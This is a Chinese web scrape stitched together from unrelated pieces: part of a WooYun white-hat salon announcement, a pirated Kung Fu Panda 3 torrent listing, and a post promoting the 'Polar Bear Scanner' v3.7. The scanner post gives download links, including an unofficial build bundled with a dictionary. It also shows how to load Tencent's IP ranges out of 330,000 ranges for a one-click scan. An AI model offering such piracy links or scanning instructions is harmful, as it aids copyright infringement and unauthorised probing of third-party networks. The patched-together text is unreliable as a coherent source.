- 现场交流部分,会有一位传奇白帽子到场(嗯,他说他要来的~好开心…让我痴一会儿~先不告诉你们他是谁,反正不会让你们失望啦~

 

- 按照老规矩,乌云沙龙对高校学生进行邀请,如果你是高校学生,如果你也和我一样期待乌云沙龙,但是又没有足够的WB购买门票你可以选择一下的几种方式参与到乌云沙龙

 

- 1:提交议题,审核通过后不仅可以给自己一个舞台还可以带着你的小伙伴一起来听哦;

- 2:私信我,说明情况并且给出足够的证明然后你就有机会免费来分享乌云沙龙的议题啦。

 

- 门票购买地址:http://www.wooyun.org/market/372(我在深圳等你们~)

 

- 在茶歇的时候(嗯,或者是所有议题结束之后,时间看我心情)我们搞个小抽奖,奖品我只能告诉你会有三个白帽的邀请码,具体数量我就不说了,还会有听云带来的可爱的抱枕~(这个你们谁抽到了可以送给我喔~么么哒),至于还会有什么,看我心情了~(评论里可以多夸我几句…


译  名 Kung Fu Panda 3
片  名 功夫熊猫3/熊猫阿宝3/阿宝正传3
年  代 2016
国  家 中国大陆 / 美国
类  别 喜剧 / 动作 / 动画 / 冒险
上映日期 2016年1月29日 中国
语  言 英语
字  幕 简体中英 / 简体
链  接 http://www.imdb.com/title/tt2267968/
评  分 7.8/10 from 754 users
豆瓣评分 8.0/10 from 84,5856 users
豆瓣链接 http://movie.douban.com/subject/11589036/
文件格式 x264 + AAC
视频尺寸 1280 x 720
文件大小 1.98 GB
片  长 95分钟
导  演 亚历山德罗·卡罗尼  Alessandro Carloni
吕寅荣  Jennifer Yuh
主  演 杰克·布莱克  Jack Black ... Po
布莱恩·科兰斯顿  Bryan Cranston
达斯汀·霍夫曼  Dustin Hoffman
安吉丽娜·朱莉  Angelina Jolie
J·K·西蒙斯  J.K. Simmons
塞斯·罗根Jackie Chan
塞斯·罗根  Seth Rogen
刘玉玲  Lucy Liu
David Cross
凯特·哈德森  Kate Hudson
吴汉章  James Hong
兰德尔·杜克·金  Randall Duk Kim

影视简介:

在新一集故事里,阿宝(杰克·布莱克 Jack Black 配音)失散已久的亲生父亲突然现身,重逢的父子二人一起来到了一片不为人知的熊猫乐土。在这里,阿宝遇到了好多滑稽的熊猫同类。当拥有神秘力量的大反派天煞(J·K·西蒙斯 J.K. Simmons 配音)横扫神州大地,妄图残害所有功夫高手时,阿宝必须迎难而上,学着把那些热爱享乐、笨手笨脚的熊猫村民训练成一班所向披靡的功夫熊猫!

影视截图:

[功夫熊猫3][HC-HDRip.720P.MKV][1.93GB][中英字幕].torrent

 

[功夫熊猫3][HC-HDRip.720P.MKV][1.93GB][中英字幕].torrent《将后缀名.txt去掉就是种子文件了》

首先很高兴能够让您点开阅读,相信以下的介绍不会让你失望的!~

北极熊扫描器已经有三个年头了,本次更新又是一次大胆的尝试,增加了33万个IP段,一键导入扫描,减少了软件因为多线程导致程序崩溃的概率
000.jpg

还是老样子,需要先在【左上角】——【控制中心】——【模式设置】——【工程模式】
001.jpg
好了,那么完整版的功能已经全部展现出来了..接下来要怎么玩?
直接去数据中心看看这33万个IP段吧。。。
003.jpg
输入关键字【腾讯】抱歉企鹅躺枪了。。。。
004.jpg
然后加入任务就可以了
005.jpg
以下是【本地搜索】的一个功能截图
007.jpg
008.jpg
其他的,,,就不详细介绍了,以下会附上完整的使用手册

软件名称:北极熊扫描器

版本:3.7  (2016年3月5日)

系统支持:windows

下载地址:http://www.im-fox.com/x.rar

百度网盘:http://pan.baidu.com/s/1eQQ29bk

帮助文档:http://www.im-fox.com/北极熊扫描器使用手册.doc

 

改版,带字典,非官方版本:http://pan.baidu.com/s/1i4uOIUx

从去年的8月开始以来,我就一直以坚持的心态让自己一直都在坚持更新,分享,就在今年春节,2月8号,域名到期,我是通过代理商注册,找不到代理商域名就一直处于一直被别人注册的状态,因为是过年的原因,一直没管,知道昨天,才联系到代理商将域名重新解析。数据都在,有任何需要的资源,本站又没有分享过的,可以联系我,尽量会满足各位!

 

 

新年快乐!